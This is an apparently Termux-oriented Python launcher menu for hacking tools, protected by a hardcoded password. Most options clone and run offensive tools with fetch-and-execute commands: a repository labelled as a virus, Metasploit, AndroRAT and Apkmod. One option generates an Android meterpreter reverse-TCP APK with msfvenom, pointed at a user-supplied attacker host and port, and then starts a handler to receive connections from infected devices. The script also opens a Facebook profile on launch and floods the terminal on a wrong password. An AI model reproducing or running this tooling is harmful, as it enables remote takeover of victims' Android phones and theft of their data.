import os
os.system('clear')

os.system('xdg-open https://www.facebook.com/profile.php?id=100040314169855')

hhhhhh = '\33[1;31m'
print(hhhhhh)
print('â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—')
print('    Glitch    ')
print('â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•')
print(' ')
print('â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—')
print(' Glitch   ')
print('â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•')

W  = '\33[0m'  
R  = '\33[1;31m' 
G  = '\33[1;32m' 
O  = '\33[1;33m' 
B  = '\33[1;34m' 
P  = '\33[1;35m' 
C  = '\33[1;36m' 
GR = '\33[1;37m' 
print(R+'   PASSWORD ==> Glitch')
print('  ')
print(' ')
nn =input(B+'Â»Â»Â» PASSWIR ====>')
if nn == 'Glitch':
    os.system('clear')
    print('  ')
    print(G+'      â”ˆâ”ˆâ”ˆâ•²â”ˆâ”ˆâ”ˆâ”ˆâ•±â”ˆâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆ')
    print(G+'      â”ˆâ”ˆâ”ˆâ•±â–”â–”â–”â–”â•²â”ˆâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆ')
    print(G+'      â”ˆâ”ˆâ”ƒâ”ˆâ–‡â”ˆâ”ˆâ–‡â”ˆâ”ƒâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆ')
    print(G+'      â•­â•®â”£â”â”â”â”â”â”â”«â•­â•®â”ˆâ”ˆâ”ˆâ”ˆ')
    print(R+'      â”ƒâ”ƒâ”ƒâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆâ”ƒâ”ƒâ”ƒâ”ˆâ”ˆâ”ˆâ”ˆ')
    print(R+'      â•°â•¯â”ƒâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆâ”ƒâ•°â•¯â”ˆâ”ˆâ”ˆâ”ˆ')
    print(R+'      â”ˆâ”ˆâ•°â”“â”â”â”â”“â”â•¯â”ˆâ”ˆâ”ˆâ”ˆâ”ˆâ”ˆ')
    print(R+'      â”ˆâ”ˆâ”ˆâ•°â•¯â”ˆâ”ˆâ•°â•¯â”ˆ')
    print(' ')
    print(O+'ğ’€›'*45)
    print('  ')
    print(R+'     ï¼¨ï¼¡ï¼«ï¼¥ï¼² ')
    print('  ')
    print(G+'1 VIROS ')
    print(' ')
    print('2 INSTALL kalinethunter ')
    print('  ')
    print('3 APK MOD ')
    print(' ')
    print('4 INSTALL metasploit  ')
    print(' ')
    print('5 NGROK ')
    print('  ')
    print('6 PAYLOADS metasploit')
    print('  ')
    print('7 LEDEAR_HACKING ')
    print(' ')
    print('8 SQLMAP ')
    print(' ')
    print('9 AndroRAT')
    print('  ')
    print('10 FACEBOOK  ')
    ll = input(R+' (â—£_â—¢)=ï¸»â•¦â•¤â”€ ENTER ====> ')
    if ll == '1':
        os.system('cd&&git clone https://github.com/Amerlaceset/Amer&&ls&&cd Amer&&chmod +x Amer.sh&&./Amer.sh')
    if ll == '2':
        os.system('cd&&termux-setup-storage&&pkg install wget&&wget -O install-nethunter-termux https://offs.ec/2MceZWr&&chmod +x install-nethunter-termux&&./install-nethunter-termux')
    if ll == '3':
        os.system('cd&&cd $HOME&&pkg install wget&&wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh&&bash setup.sh&&apkmod')
    if ll == '4':
        os.system('cd&&apt update&&apt upgrade -y')
        os.system('git clone https://github.com/remo7777/Termux-Metasploit; cd Termux-Metaspl*;bash setup;')
    if ll == '5':
        os.system('xdg-open https://dashboard.ngrok.com/user/signup')
    if ll == '6':
        os.system('clear')
        print(R)
        print(' â”€â”€â”€â–„â–„â–„â–„â–„â–„â”€â”€â”€â”€â”€â–„â–„â–„â–„â–„â–„')
        print('â”€â–„â–ˆâ–“â–“â–“â–“â–“â–“â–ˆâ–„â”€â–„â–ˆâ–“â–“â–“â–“â–“â–“â–ˆâ–„')
        print('â–â–ˆâ–“â–“â–’â–’â–’â–’â–’â–“â–“â–ˆâ–“â–“â–’â–’â–’â–’â–’â–“â–“â–ˆâ–Œ')
        print('â–ˆâ–“â–“â–’â–’â–‘â•”â•—â•”â•â•¦â•â•¦â•â•¦â•â•—â–‘â–’â–’â–“â–“â–ˆ')
        print('â–ˆâ–“â–“â–’â–’â–‘â•‘â• â•£â•¬â• â•—â•‘â•”â•£â•©â•£â–‘â–’â–’â–“â–“â–ˆ')
        print('â–â–ˆâ–“â–“â–’â–’â•šâ•â•©â•â•â•šâ•â•â•šâ•â•â–’â–’â–“â–“â–ˆâ–Œ')
        print('â”€â–€â–ˆâ–“â–“â–’â–’â–‘â–‘â–‘â–‘â–‘â–‘â–‘â–‘â–‘â–’â–’â–“â–“â–ˆâ–€')
        print('â”€â”€â”€â–€â–ˆâ–“â–“â–’â–’â–‘â–‘â–‘â–‘â–‘â–’â–’â–“â–“â–ˆâ–€')
        print('â”€â”€â”€â”€â”€â–€â–ˆâ–“â–“â–’â–’â–‘â–’â–’â–“â–“â–ˆâ–€')
        print('â”€â”€â”€â”€â”€â”€â–€â–ˆâ–“â–“â–’â–“â–“â–ˆâ–€')
        print('â”€â”€â”€â”€â”€â”€â”€â”€â–€â–ˆâ–“â–ˆâ–€')
        print('â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â–€  ')
        print(G)
        ho = input(' === LHOST ==> ')
        por = input(' === LPORT ==> ')
        nom = input(' === NOME PAYLOADS ==> ')
        print('wait a bit â™¡â™•')
        os.system(f'msfvenom -p android/meterpreter/reverse_tcp LHOST={ho} LPORT={por} R> /sdcard/{nom}.apk')
        print(G)
        	
        print('â•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—')
        print('   MSFCONSOLE â™¡â™¡   ')
        print('â•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•')
        print('  ')
        print('use exploit/multi/handler')
        print(' ')
        print('set Payloads andriod/meterpreter/reverse_tcp')
        print(' ')
        print('set LHOST '+ho)
        print('  ')
        print('set LPORT '+por)
        print('  ')
        print('exploit')
        print('wait a bit â™¡â™¡')
        os.system('msfconsole')
    if ll == '7':
        os.system('cd&&git clone https://github.com/Ledear-Hacker/LEDEAR_HACKING&&cd LEDEAR_HACKING&&chmod +x&&python2 ledearhacking.py')
    if ll == '8':
        os.system('cd&&git clone https://github.com/UltimateHackers/Hash-Buster&&cd Hash-Buster&&ls&&chmod +x hash.py&&python2 hash.py')
    if ll == '9':
        os.system('cd&&git clone https://github.com/karma9874/AndroRAT.git&&cd AndroRAT&&apt install openjdk-17&&pip install -r requirements.txt&&python3 androRAT.py')
    if ll == '10':
        os.system('xdg-open https://www.facebook.com/profile.php?id=100040314169855')
else:
    print('\33[1;31m EROOR EROOR'*10000)
